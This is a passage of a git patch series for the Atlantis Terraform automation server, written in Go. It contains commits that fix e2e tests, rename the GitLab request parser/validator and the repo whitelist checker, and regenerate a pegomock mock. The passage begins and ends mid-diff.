b/vendor/github.com/sirupsen/logrus/text_formatter.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/text_formatter.go rename to vendor/github.com/sirupsen/logrus/text_formatter.go diff --git a/vendor/github.com/Sirupsen/logrus/text_formatter_test.go b/vendor/github.com/sirupsen/logrus/text_formatter_test.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/text_formatter_test.go rename to vendor/github.com/sirupsen/logrus/text_formatter_test.go diff --git a/vendor/github.com/Sirupsen/logrus/writer.go b/vendor/github.com/sirupsen/logrus/writer.go similarity index 100% rename from vendor/github.com/Sirupsen/logrus/writer.go rename to vendor/github.com/sirupsen/logrus/writer.go From c6b18e383996a90e33c02776f187c59b65be2aae Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Wed, 20 Jun 2018 11:58:10 +0100 Subject: [PATCH 35/69] Fix tests --- server/events_controller_e2e_test.go | 2 ++ 1 file changed, 2 insertions(+) diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go index 3853d1349b..6044b0163f 100644 --- a/server/events_controller_e2e_test.go +++ b/server/events_controller_e2e_test.go @@ -404,6 +404,8 @@ func initializeRepo(t *testing.T, repoDir string) (string, string, func()) { runCmd(t, destDir, "git", "init") runCmd(t, destDir, "touch", ".gitkeep") runCmd(t, destDir, "git", "add", ".gitkeep") + runCmd(t, destDir, "git", "config", "--local", "user.email", "atlantisbot@runatlantis.io") + runCmd(t, destDir, "git", "config", "--local", "user.name", "atlantisbot") runCmd(t, destDir, "git", "commit", "-m", "initial commit") runCmd(t, destDir, "git", "checkout", "-b", "branch") runCmd(t, destDir, "git", "add", ".") From 856c0d0c728abfadb801e6e88d24b2aa209fbdab Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Wed, 20 Jun 2018 12:19:16 +0100 Subject: [PATCH 36/69] Use atlantisbot --- e2e/.gitconfig | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/e2e/.gitconfig b/e2e/.gitconfig index 
43da800f32..3424a0e076 100644 --- a/e2e/.gitconfig +++ b/e2e/.gitconfig @@ -1,3 +1,3 @@ [user] - name = Luke Kysow + name = atlantisbot email = lkysow+atlantis@gmail.com \ No newline at end of file From c98d1040c584b2956bab67bb3f83558696301563 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Wed, 20 Jun 2018 12:42:25 +0100 Subject: [PATCH 37/69] Update e2e for new version. --- e2e/e2e.go | 9 +-------- e2e/main.go | 5 ++--- 2 files changed, 3 insertions(+), 11 deletions(-) diff --git a/e2e/e2e.go b/e2e/e2e.go index 041f240d7b..bf51830782 100644 --- a/e2e/e2e.go +++ b/e2e/e2e.go @@ -128,14 +128,7 @@ func (t *E2ETester) Start() (*E2EResult, error) { // defer closing pull request and delete remote branch defer cleanUp(t, pull.GetNumber(), branchName) // nolint: errcheck - // create run plan comment - log.Printf("creating plan comment: %q", t.projectType.PlanCommand) - _, _, err = t.githubClient.client.Issues.CreateComment(t.githubClient.ctx, t.ownerName, t.repoName, pull.GetNumber(), &github.IssueComment{Body: github.String(t.projectType.PlanCommand)}) - if err != nil { - return e2eResult, fmt.Errorf("error creating 'run plan' comment on github") - } - - // wait for atlantis to respond to webhook + // wait for atlantis to respond to webhook and autoplan. 
time.Sleep(2 * time.Second) state := "not started" diff --git a/e2e/main.go b/e2e/main.go index 0f1e9f274a..8513032415 100644 --- a/e2e/main.go +++ b/e2e/main.go @@ -27,13 +27,12 @@ import ( var defaultAtlantisURL = "http://localhost:4141" var projectTypes = []Project{ - {"standalone", "atlantis plan", "atlantis apply"}, - {"standalone-with-workspace", "atlantis plan -w staging", "atlantis apply -w staging"}, + {"standalone", "atlantis apply -d standalone"}, + {"standalone-with-workspace", "atlantis apply -d standalone-with-workspace -w staging"}, } type Project struct { Name string - PlanCommand string ApplyCommand string } From 0c966d50e9b4e3d00cc2a8bfc24f2f653f1b10bb Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Wed, 20 Jun 2018 15:11:44 +0100 Subject: [PATCH 38/69] GitlabRequestParser -> GitlabRequestParserValidator --- server/events_controller.go | 8 +- server/events_controller_e2e_test.go | 14 ++-- server/events_controller_test.go | 52 ++++++------ ....go => gitlab_request_parser_validator.go} | 22 ++--- ...> gitlab_request_parser_validator_test.go} | 18 ++-- server/mocks/mock_gitlab_request_parser.go | 84 ------------------- .../mock_gitlab_request_parser_validator.go | 84 +++++++++++++++++++ server/server.go | 28 +++---- 8 files changed, 155 insertions(+), 155 deletions(-) rename server/{gitlab_request_parser.go => gitlab_request_parser_validator.go} (74%) rename server/{gitlab_request_parser_test.go => gitlab_request_parser_validator_test.go} (96%) delete mode 100644 server/mocks/mock_gitlab_request_parser.go create mode 100644 server/mocks/mock_gitlab_request_parser_validator.go diff --git a/server/events_controller.go b/server/events_controller.go index a132b094c9..95faa70299 100644 --- a/server/events_controller.go +++ b/server/events_controller.go @@ -39,9 +39,9 @@ type EventsController struct { // GithubWebHookSecret is the secret added to this webhook via the GitHub // UI that identifies this call as coming from GitHub. 
If empty, no // request validation is done. - GithubWebHookSecret []byte - GithubRequestValidator GithubRequestValidator - GitlabRequestParser GitlabRequestParser + GithubWebHookSecret []byte + GithubRequestValidator GithubRequestValidator + GitlabRequestParserValidator GitlabRequestParserValidator // GitlabWebHookSecret is the secret added to this webhook via the GitLab // UI that identifies this call as coming from GitLab. If empty, no // request validation is done. @@ -208,7 +208,7 @@ func (e *EventsController) handlePullRequestEvent(w http.ResponseWriter, baseRep } func (e *EventsController) handleGitlabPost(w http.ResponseWriter, r *http.Request) { - event, err := e.GitlabRequestParser.Validate(r, e.GitlabWebHookSecret) + event, err := e.GitlabRequestParserValidator.ParseAndValidate(r, e.GitlabWebHookSecret) if err != nil { e.respond(w, logging.Warn, http.StatusBadRequest, err.Error()) return diff --git a/server/events_controller_e2e_test.go b/server/events_controller_e2e_test.go index 6044b0163f..f1dc0958fa 100644 --- a/server/events_controller_e2e_test.go +++ b/server/events_controller_e2e_test.go @@ -286,13 +286,13 @@ func setupE2E(t *testing.T) (server.EventsController, *vcsmocks.MockClientProxy, VCSClient: e2eVCSClient, Workspace: atlantisWorkspace, }, - Logger: logger, - Parser: eventParser, - CommentParser: commentParser, - GithubWebHookSecret: nil, - GithubRequestValidator: &server.DefaultGithubRequestValidator{}, - GitlabRequestParser: &server.DefaultGitlabRequestParser{}, - GitlabWebHookSecret: nil, + Logger: logger, + Parser: eventParser, + CommentParser: commentParser, + GithubWebHookSecret: nil, + GithubRequestValidator: &server.DefaultGithubRequestValidator{}, + GitlabRequestParserValidator: &server.DefaultGitlabRequestParserValidator{}, + GitlabWebHookSecret: nil, RepoWhitelist: &events.RepoWhitelist{ Whitelist: "*", }, diff --git a/server/events_controller_test.go b/server/events_controller_test.go index bb0682ba6f..9d35a22655 100644 --- 
a/server/events_controller_test.go +++ b/server/events_controller_test.go @@ -90,7 +90,7 @@ func TestPost_InvalidGitlabSecret(t *testing.T) { w := httptest.NewRecorder() req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) req.Header.Set(gitlabHeader, "value") - When(gl.Validate(req, secret)).ThenReturn(nil, errors.New("err")) + When(gl.ParseAndValidate(req, secret)).ThenReturn(nil, errors.New("err")) e.Post(w, req) responseContains(t, w, http.StatusBadRequest, "err") } @@ -112,7 +112,7 @@ func TestPost_UnsupportedGitlabEvent(t *testing.T) { w := httptest.NewRecorder() req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) req.Header.Set(gitlabHeader, "value") - When(gl.Validate(req, secret)).ThenReturn([]byte(`{"not an event": ""}`), nil) + When(gl.ParseAndValidate(req, secret)).ThenReturn([]byte(`{"not an event": ""}`), nil) e.Post(w, req) responseContains(t, w, http.StatusOK, "Ignoring unsupported event") } @@ -148,7 +148,7 @@ func TestPost_GitlabCommentInvalidCommand(t *testing.T) { e, _, gl, _, _, _, _, cp := setup(t) req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) req.Header.Set(gitlabHeader, "value") - When(gl.Validate(req, secret)).ThenReturn(gitlab.MergeCommentEvent{}, nil) + When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlab.MergeCommentEvent{}, nil) When(cp.Parse("", models.Gitlab)).ThenReturn(events.CommentParseResult{Ignore: true}) w := httptest.NewRecorder() e.Post(w, req) @@ -174,13 +174,13 @@ func TestPost_GitlabCommentNotWhitelisted(t *testing.T) { RegisterMockTestingT(t) vcsClient := vcsmocks.NewMockClientProxy() e := server.EventsController{ - Logger: logging.NewNoopLogger(), - CommentParser: &events.CommentParser{}, - GitlabRequestParser: &server.DefaultGitlabRequestParser{}, - Parser: &events.EventParser{}, - SupportedVCSHosts: []models.VCSHostType{models.Gitlab}, - RepoWhitelist: &events.RepoWhitelist{}, - VCSClient: vcsClient, + Logger: logging.NewNoopLogger(), + CommentParser: &events.CommentParser{}, + 
GitlabRequestParserValidator: &server.DefaultGitlabRequestParserValidator{}, + Parser: &events.EventParser{}, + SupportedVCSHosts: []models.VCSHostType{models.Gitlab}, + RepoWhitelist: &events.RepoWhitelist{}, + VCSClient: vcsClient, } requestJSON, err := ioutil.ReadFile(filepath.Join("testfixtures", "gitlabMergeCommentEvent_notWhitelisted.json")) Ok(t, err) @@ -231,7 +231,7 @@ func TestPost_GitlabCommentResponse(t *testing.T) { e, _, gl, _, _, _, vcsClient, cp := setup(t) req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) req.Header.Set(gitlabHeader, "value") - When(gl.Validate(req, secret)).ThenReturn(gitlab.MergeCommentEvent{}, nil) + When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlab.MergeCommentEvent{}, nil) When(cp.Parse("", models.Gitlab)).ThenReturn(events.CommentParseResult{CommentResponse: "a comment"}) w := httptest.NewRecorder() e.Post(w, req) @@ -262,7 +262,7 @@ func TestPost_GitlabCommentSuccess(t *testing.T) { e, _, gl, _, cr, _, _, _ := setup(t) req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) req.Header.Set(gitlabHeader, "value") - When(gl.Validate(req, secret)).ThenReturn(gitlab.MergeCommentEvent{}, nil) + When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlab.MergeCommentEvent{}, nil) w := httptest.NewRecorder() e.Post(w, req) responseContains(t, w, http.StatusOK, "Processing...") @@ -362,7 +362,7 @@ func TestPost_GitlabMergeRequestErrCleaningPull(t *testing.T) { e, _, gl, p, _, c, _, _ := setup(t) req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil)) req.Header.Set(gitlabHeader, "value") - When(gl.Validate(req, secret)).ThenReturn(gitlabMergeEvent, nil) + When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlabMergeEvent, nil) repo := models.Repo{} pullRequest := models.PullRequest{State: models.Closed} When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, nil) @@ -395,7 +395,7 @@ func TestPost_GitlabMergeRequestSuccess(t *testing.T) { e, _, gl, p, _, _, _, _ := setup(t) req, _ := 
http.NewRequest("GET", "", bytes.NewBuffer(nil)) req.Header.Set(gitlabHeader, "value") - When(gl.Validate(req, secret)).ThenReturn(gitlabMergeEvent, nil) + When(gl.ParseAndValidate(req, secret)).ThenReturn(gitlabMergeEvent, nil) repo := models.Repo{} pullRequest := models.PullRequest{State: models.Closed} When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, nil) @@ -404,26 +404,26 @@ func TestPost_GitlabMergeRequestSuccess(t *testing.T) { responseContains(t, w, http.StatusOK, "Pull request cleaned successfully") } -func setup(t *testing.T) (server.EventsController, *mocks.MockGithubRequestValidator, *mocks.MockGitlabRequestParser, *emocks.MockEventParsing, *emocks.MockCommandRunner, *emocks.MockPullCleaner, *vcsmocks.MockClientProxy, *emocks.MockCommentParsing) { +func setup(t *testing.T) (server.EventsController, *mocks.MockGithubRequestValidator, *mocks.MockGitlabRequestParserValidator, *emocks.MockEventParsing, *emocks.MockCommandRunner, *emocks.MockPullCleaner, *vcsmocks.MockClientProxy, *emocks.MockCommentParsing) { RegisterMockTestingT(t) v := mocks.NewMockGithubRequestValidator() - gl := mocks.NewMockGitlabRequestParser() + gl := mocks.NewMockGitlabRequestParserValidator() p := emocks.NewMockEventParsing() cp := emocks.NewMockCommentParsing() cr := emocks.NewMockCommandRunner() c := emocks.NewMockPullCleaner() vcsmock := vcsmocks.NewMockClientProxy() e := server.EventsController{ - Logger: logging.NewNoopLogger(), - GithubRequestValidator: v, - Parser: p, - CommentParser: cp, - CommandRunner: cr, - PullCleaner: c, - GithubWebHookSecret: secret, - SupportedVCSHosts: []models.VCSHostType{models.Github, models.Gitlab}, - GitlabWebHookSecret: secret, - GitlabRequestParser: gl, + Logger: logging.NewNoopLogger(), + GithubRequestValidator: v, + Parser: p, + CommentParser: cp, + CommandRunner: cr, + PullCleaner: c, + GithubWebHookSecret: secret, + SupportedVCSHosts: []models.VCSHostType{models.Github, models.Gitlab}, + 
GitlabWebHookSecret: secret, + GitlabRequestParserValidator: gl, RepoWhitelist: &events.RepoWhitelist{ Whitelist: "*", }, diff --git a/server/gitlab_request_parser.go b/server/gitlab_request_parser_validator.go similarity index 74% rename from server/gitlab_request_parser.go rename to server/gitlab_request_parser_validator.go index 94ab4ddd5a..ee486248f9 100644 --- a/server/gitlab_request_parser.go +++ b/server/gitlab_request_parser_validator.go @@ -24,18 +24,18 @@ import ( const secretHeader = "X-Gitlab-Token" // #nosec -//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_gitlab_request_parser.go GitlabRequestParser +//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_gitlab_request_parser_validator.go GitlabRequestParserValidator -// GitlabRequestParser parses and validates GitLab requests. -type GitlabRequestParser interface { - // Validate validates that the request has a token header matching secret. +// GitlabRequestParserValidator parses and validates GitLab requests. +type GitlabRequestParserValidator interface { + // ParseAndValidate validates that the request has a token header matching secret. // If the secret does not match it returns an error. // If secret is empty it does not check the token header. // It then parses the request as a GitLab object depending on the header // provided by GitLab identifying the webhook type. If the webhook type // is not recognized it will return nil but will not return an error. 
// Usage: - // event, err := GitlabRequestParser.Validate(r, secret) + // event, err := GitlabRequestParserValidator.ParseAndValidate(r, secret) // if err != nil { // return // } @@ -47,15 +47,15 @@ type GitlabRequestParser interface { // default: // // unsupported event // } - Validate(r *http.Request, secret []byte) (interface{}, error) + ParseAndValidate(r *http.Request, secret []byte) (interface{}, error) } -// DefaultGitlabRequestParser parses and validates GitLab requests. -type DefaultGitlabRequestParser struct{} +// DefaultGitlabRequestParserValidator parses and validates GitLab requests. +type DefaultGitlabRequestParserValidator struct{} -// Validate returns the JSON payload of the request. -// See GitlabRequestParser.Validate() -func (d *DefaultGitlabRequestParser) Validate(r *http.Request, secret []byte) (interface{}, error) { +// ParseAndValidate returns the JSON payload of the request. +// See GitlabRequestParserValidator.ParseAndValidate(). +func (d *DefaultGitlabRequestParserValidator) ParseAndValidate(r *http.Request, secret []byte) (interface{}, error) { const mergeEventHeader = "Merge Request Hook" const noteEventHeader = "Note Hook" diff --git a/server/gitlab_request_parser_test.go b/server/gitlab_request_parser_validator_test.go similarity index 96% rename from server/gitlab_request_parser_test.go rename to server/gitlab_request_parser_validator_test.go index 385d718795..eacbc1d4a2 100644 --- a/server/gitlab_request_parser_test.go +++ b/server/gitlab_request_parser_validator_test.go @@ -24,7 +24,7 @@ import ( . 
"github.com/runatlantis/atlantis/testing" ) -var parser = server.DefaultGitlabRequestParser{} +var parser = server.DefaultGitlabRequestParserValidator{} func TestValidate_InvalidSecret(t *testing.T) { t.Log("If the secret header is set and doesn't match expected an error is returned") @@ -33,7 +33,7 @@ func TestValidate_InvalidSecret(t *testing.T) { req, err := http.NewRequest("POST", "http://localhost/event", buf) Ok(t, err) req.Header.Set("X-Gitlab-Token", "does-not-match") - _, err = parser.Validate(req, []byte("secret")) + _, err = parser.ParseAndValidate(req, []byte("secret")) Assert(t, err != nil, "should be an error") Equals(t, "header X-Gitlab-Token=does-not-match did not match expected secret", err.Error()) } @@ -46,7 +46,7 @@ func TestValidate_ValidSecret(t *testing.T) { Ok(t, err) req.Header.Set("X-Gitlab-Token", "secret") req.Header.Set("X-Gitlab-Event", "Merge Request Hook") - b, err := parser.Validate(req, []byte("secret")) + b, err := parser.ParseAndValidate(req, []byte("secret")) Ok(t, err) Equals(t, "Gitlab Test", b.(gitlab.MergeEvent).Project.Name) } @@ -59,7 +59,7 @@ func TestValidate_NoSecret(t *testing.T) { Ok(t, err) req.Header.Set("X-Gitlab-Token", "random secret") req.Header.Set("X-Gitlab-Event", "Merge Request Hook") - b, err := parser.Validate(req, nil) + b, err := parser.ParseAndValidate(req, nil) Ok(t, err) Equals(t, "Gitlab Test", b.(gitlab.MergeEvent).Project.Name) } @@ -71,7 +71,7 @@ func TestValidate_InvalidMergeEvent(t *testing.T) { req, err := http.NewRequest("POST", "http://localhost/event", buf) Ok(t, err) req.Header.Set("X-Gitlab-Event", "Merge Request Hook") - _, err = parser.Validate(req, nil) + _, err = parser.ParseAndValidate(req, nil) Assert(t, err != nil, "should be an error") Equals(t, "unexpected end of JSON input", err.Error()) } @@ -83,7 +83,7 @@ func TestValidate_InvalidMergeCommentEvent(t *testing.T) { req, err := http.NewRequest("POST", "http://localhost/event", buf) Ok(t, err) req.Header.Set("X-Gitlab-Event", "Note 
Hook") - _, err = parser.Validate(req, nil) + _, err = parser.ParseAndValidate(req, nil) Assert(t, err != nil, "should be an error") Equals(t, "unexpected end of JSON input", err.Error()) } @@ -95,7 +95,7 @@ func TestValidate_UnrecognizedEvent(t *testing.T) { req, err := http.NewRequest("POST", "http://localhost/event", buf) Ok(t, err) req.Header.Set("X-Gitlab-Event", "Random Event") - event, err := parser.Validate(req, nil) + event, err := parser.ParseAndValidate(req, nil) Ok(t, err) Equals(t, nil, event) } @@ -107,7 +107,7 @@ func TestValidate_ValidMergeEvent(t *testing.T) { req, err := http.NewRequest("POST", "http://localhost/event", buf) Ok(t, err) req.Header.Set("X-Gitlab-Event", "Merge Request Hook") - b, err := parser.Validate(req, nil) + b, err := parser.ParseAndValidate(req, nil) Ok(t, err) Equals(t, "Gitlab Test", b.(gitlab.MergeEvent).Project.Name) RegisterMockTestingT(t) @@ -120,7 +120,7 @@ func TestValidate_ValidMergeCommentEvent(t *testing.T) { req, err := http.NewRequest("POST", "http://localhost/event", buf) Ok(t, err) req.Header.Set("X-Gitlab-Event", "Note Hook") - b, err := parser.Validate(req, nil) + b, err := parser.ParseAndValidate(req, nil) Ok(t, err) Equals(t, "Gitlab Test", b.(gitlab.MergeCommentEvent).Project.Name) RegisterMockTestingT(t) diff --git a/server/mocks/mock_gitlab_request_parser.go b/server/mocks/mock_gitlab_request_parser.go deleted file mode 100644 index e4598a1fe1..0000000000 --- a/server/mocks/mock_gitlab_request_parser.go +++ /dev/null @@ -1,84 +0,0 @@ -// Automatically generated by pegomock. DO NOT EDIT! 
-// Source: github.com/runatlantis/atlantis/server (interfaces: GitlabRequestParser) - -package mocks - -import ( - http "net/http" - "reflect" - - pegomock "github.com/petergtz/pegomock" -) - -type MockGitlabRequestParser struct { - fail func(message string, callerSkip ...int) -} - -func NewMockGitlabRequestParser() *MockGitlabRequestParser { - return &MockGitlabRequestParser{fail: pegomock.GlobalFailHandler} -} - -func (mock *MockGitlabRequestParser) Validate(r *http.Request, secret []byte) (interface{}, error) { - params := []pegomock.Param{r, secret} - result := pegomock.GetGenericMockFrom(mock).Invoke("Validate", params, []reflect.Type{reflect.TypeOf((*interface{})(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()}) - var ret0 interface{} - var ret1 error - if len(result) != 0 { - if result[0] != nil { - ret0 = result[0].(interface{}) - } - if result[1] != nil { - ret1 = result[1].(error) - } - } - return ret0, ret1 -} - -func (mock *MockGitlabRequestParser) VerifyWasCalledOnce() *VerifierGitlabRequestParser { - return &VerifierGitlabRequestParser{mock, pegomock.Times(1), nil} -} - -func (mock *MockGitlabRequestParser) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierGitlabRequestParser { - return &VerifierGitlabRequestParser{mock, invocationCountMatcher, nil} -} - -func (mock *MockGitlabRequestParser) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierGitlabRequestParser { - return &VerifierGitlabRequestParser{mock, invocationCountMatcher, inOrderContext} -} - -type VerifierGitlabRequestParser struct { - mock *MockGitlabRequestParser - invocationCountMatcher pegomock.Matcher - inOrderContext *pegomock.InOrderContext -} - -func (verifier *VerifierGitlabRequestParser) Validate(r *http.Request, secret []byte) *GitlabRequestParser_Validate_OngoingVerification { - params := []pegomock.Param{r, secret} - methodInvocations := 
pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Validate", params) - return &GitlabRequestParser_Validate_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} -} - -type GitlabRequestParser_Validate_OngoingVerification struct { - mock *MockGitlabRequestParser - methodInvocations []pegomock.MethodInvocation -} - -func (c *GitlabRequestParser_Validate_OngoingVerification) GetCapturedArguments() (*http.Request, []byte) { - r, secret := c.GetAllCapturedArguments() - return r[len(r)-1], secret[len(secret)-1] -} - -func (c *GitlabRequestParser_Validate_OngoingVerification) GetAllCapturedArguments() (_param0 []*http.Request, _param1 [][]byte) { - params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) - if len(params) > 0 { - _param0 = make([]*http.Request, len(params[0])) - for u, param := range params[0] { - _param0[u] = param.(*http.Request) - } - _param1 = make([][]byte, len(params[1])) - for u, param := range params[1] { - _param1[u] = param.([]byte) - } - } - return -} diff --git a/server/mocks/mock_gitlab_request_parser_validator.go b/server/mocks/mock_gitlab_request_parser_validator.go new file mode 100644 index 0000000000..c23738294a --- /dev/null +++ b/server/mocks/mock_gitlab_request_parser_validator.go @@ -0,0 +1,84 @@ +// Automatically generated by pegomock. DO NOT EDIT! 
+// Source: github.com/runatlantis/atlantis/server (interfaces: GitlabRequestParserValidator) + +package mocks + +import ( + http "net/http" + "reflect" + + pegomock "github.com/petergtz/pegomock" +) + +type MockGitlabRequestParserValidator struct { + fail func(message string, callerSkip ...int) +} + +func NewMockGitlabRequestParserValidator() *MockGitlabRequestParserValidator { + return &MockGitlabRequestParserValidator{fail: pegomock.GlobalFailHandler} +} + +func (mock *MockGitlabRequestParserValidator) ParseAndValidate(r *http.Request, secret []byte) (interface{}, error) { + params := []pegomock.Param{r, secret} + result := pegomock.GetGenericMockFrom(mock).Invoke("ParseAndValidate", params, []reflect.Type{reflect.TypeOf((*interface{})(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()}) + var ret0 interface{} + var ret1 error + if len(result) != 0 { + if result[0] != nil { + ret0 = result[0].(interface{}) + } + if result[1] != nil { + ret1 = result[1].(error) + } + } + return ret0, ret1 +} + +func (mock *MockGitlabRequestParserValidator) VerifyWasCalledOnce() *VerifierGitlabRequestParserValidator { + return &VerifierGitlabRequestParserValidator{mock, pegomock.Times(1), nil} +} + +func (mock *MockGitlabRequestParserValidator) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierGitlabRequestParserValidator { + return &VerifierGitlabRequestParserValidator{mock, invocationCountMatcher, nil} +} + +func (mock *MockGitlabRequestParserValidator) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierGitlabRequestParserValidator { + return &VerifierGitlabRequestParserValidator{mock, invocationCountMatcher, inOrderContext} +} + +type VerifierGitlabRequestParserValidator struct { + mock *MockGitlabRequestParserValidator + invocationCountMatcher pegomock.Matcher + inOrderContext *pegomock.InOrderContext +} + +func (verifier *VerifierGitlabRequestParserValidator) ParseAndValidate(r *http.Request, 
secret []byte) *GitlabRequestParserValidator_ParseAndValidate_OngoingVerification { + params := []pegomock.Param{r, secret} + methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "ParseAndValidate", params) + return &GitlabRequestParserValidator_ParseAndValidate_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} +} + +type GitlabRequestParserValidator_ParseAndValidate_OngoingVerification struct { + mock *MockGitlabRequestParserValidator + methodInvocations []pegomock.MethodInvocation +} + +func (c *GitlabRequestParserValidator_ParseAndValidate_OngoingVerification) GetCapturedArguments() (*http.Request, []byte) { + r, secret := c.GetAllCapturedArguments() + return r[len(r)-1], secret[len(secret)-1] +} + +func (c *GitlabRequestParserValidator_ParseAndValidate_OngoingVerification) GetAllCapturedArguments() (_param0 []*http.Request, _param1 [][]byte) { + params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) + if len(params) > 0 { + _param0 = make([]*http.Request, len(params[0])) + for u, param := range params[0] { + _param0[u] = param.(*http.Request) + } + _param1 = make([][]byte, len(params[1])) + for u, param := range params[1] { + _param1[u] = param.([]byte) + } + } + return +} diff --git a/server/server.go b/server/server.go index 734a36de4d..63bd77a83f 100644 --- a/server/server.go +++ b/server/server.go @@ -273,20 +273,20 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { LockDetailTemplate: lockTemplate, } eventsController := &EventsController{ - CommandRunner: commandHandler, - PullCleaner: pullClosedExecutor, - Parser: eventParser, - CommentParser: commentParser, - Logger: logger, - GithubWebHookSecret: []byte(userConfig.GithubWebHookSecret), - GithubRequestValidator: &DefaultGithubRequestValidator{}, - GitlabRequestParser: &DefaultGitlabRequestParser{}, - GitlabWebHookSecret: 
[]byte(userConfig.GitlabWebHookSecret), - RepoWhitelist: repoWhitelist, - SupportedVCSHosts: supportedVCSHosts, - VCSClient: vcsClient, - AtlantisGithubUser: models.User{Username: userConfig.GithubUser}, - AtlantisGitlabUser: models.User{Username: userConfig.GitlabUser}, + CommandRunner: commandHandler, + PullCleaner: pullClosedExecutor, + Parser: eventParser, + CommentParser: commentParser, + Logger: logger, + GithubWebHookSecret: []byte(userConfig.GithubWebHookSecret), + GithubRequestValidator: &DefaultGithubRequestValidator{}, + GitlabRequestParserValidator: &DefaultGitlabRequestParserValidator{}, + GitlabWebHookSecret: []byte(userConfig.GitlabWebHookSecret), + RepoWhitelist: repoWhitelist, + SupportedVCSHosts: supportedVCSHosts, + VCSClient: vcsClient, + AtlantisGithubUser: models.User{Username: userConfig.GithubUser}, + AtlantisGitlabUser: models.User{Username: userConfig.GitlabUser}, } return &Server{ AtlantisVersion: config.AtlantisVersion, From d359131a29eec90e588eef6d5d9f4d4cc6c36218 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Wed, 20 Jun 2018 15:20:10 +0100 Subject: [PATCH 39/69] RepoWhitelist -> RepoWhitelistChecker --- ...repo_whitelist.go => repo_whitelist_checker.go} | 8 ++++---- ...list_test.go => repo_whitelist_checker_test.go} | 4 ++-- server/events_controller.go | 8 ++++---- server/events_controller_e2e_test.go | 2 +- server/events_controller_test.go | 14 +++++++------- server/router.go | 2 +- server/server.go | 4 ++-- 7 files changed, 21 insertions(+), 21 deletions(-) rename server/events/{repo_whitelist.go => repo_whitelist_checker.go} (86%) rename server/events/{repo_whitelist_test.go => repo_whitelist_checker_test.go} (96%) diff --git a/server/events/repo_whitelist.go b/server/events/repo_whitelist_checker.go similarity index 86% rename from server/events/repo_whitelist.go rename to server/events/repo_whitelist_checker.go index 06c500f48b..0e45401332 100644 --- a/server/events/repo_whitelist.go +++ b/server/events/repo_whitelist_checker.go 
@@ -21,16 +21,16 @@ import ( // Wildcard matches 0-n of all characters except commas. const Wildcard = "*" -// RepoWhitelist implements checking if repos are whitelisted to be used with +// RepoWhitelistChecker implements checking if repos are whitelisted to be used with // this Atlantis. -type RepoWhitelist struct { +type RepoWhitelistChecker struct { // Whitelist is a comma separated list of rules with wildcards '*' allowed. Whitelist string } // IsWhitelisted returns true if this repo is in our whitelist and false // otherwise. -func (r *RepoWhitelist) IsWhitelisted(repoFullName string, vcsHostname string) bool { +func (r *RepoWhitelistChecker) IsWhitelisted(repoFullName string, vcsHostname string) bool { candidate := fmt.Sprintf("%s/%s", vcsHostname, repoFullName) rules := strings.Split(r.Whitelist, ",") for _, rule := range rules { @@ -41,7 +41,7 @@ func (r *RepoWhitelist) IsWhitelisted(repoFullName string, vcsHostname string) b return false } -func (r *RepoWhitelist) matchesRule(rule string, candidate string) bool { +func (r *RepoWhitelistChecker) matchesRule(rule string, candidate string) bool { // Case insensitive compare. rule = strings.ToLower(rule) candidate = strings.ToLower(candidate) diff --git a/server/events/repo_whitelist_test.go b/server/events/repo_whitelist_checker_test.go similarity index 96% rename from server/events/repo_whitelist_test.go rename to server/events/repo_whitelist_checker_test.go index 21e3585725..d6f3f07e11 100644 --- a/server/events/repo_whitelist_test.go +++ b/server/events/repo_whitelist_checker_test.go @@ -20,7 +20,7 @@ import ( . 
